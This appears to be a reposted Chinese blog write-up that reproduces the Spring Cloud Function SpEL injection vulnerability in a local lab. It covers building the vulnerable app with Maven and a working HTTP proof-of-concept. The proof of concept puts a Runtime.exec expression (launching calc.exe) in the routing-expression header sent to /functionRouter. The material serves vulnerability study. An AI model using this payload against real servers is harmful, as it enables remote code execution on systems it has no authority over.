1、漏洞环境搭建
由于漏洞出现在前两天,原本等待vulhub出环境,直接docker 一键就ok了。但是这次vulhub好像不太及时。对于自己只能自己搭建环境了。
找了许久,终于在唐大佬的github中找到几乎一键的方法。
参考链接:https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel 这里放原始链接以表示尊重。
无法上github的话,私信我。
搭建方法很简单,先安装maven jdk 等。大佬是jdk17 我本地下载最新版本18 也是ok
方法如下:下载代码后,在解压目录cmd执行 mvn spring-boot:run 会下载很多库,需要耐心等待。成功后会开启8080 端口。
漏洞poc极其简单:
路径最好使用funtionRouter,原因自查。此环境倒是任意路径都ok。
POST /functionRouter HTTP/1.1
Host: 192.168.1.7:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc.exe")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
漏洞验证:
到此这篇关于Spring-Cloud-Function-Spel 漏洞复现的文章就介绍到这了,更多相关Spring-Cloud-Function-Spel 漏洞内容请搜索服务器之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持服务器之家!
原文地址:https://www.cnblogs.com/yilishazi/p/16070281.html
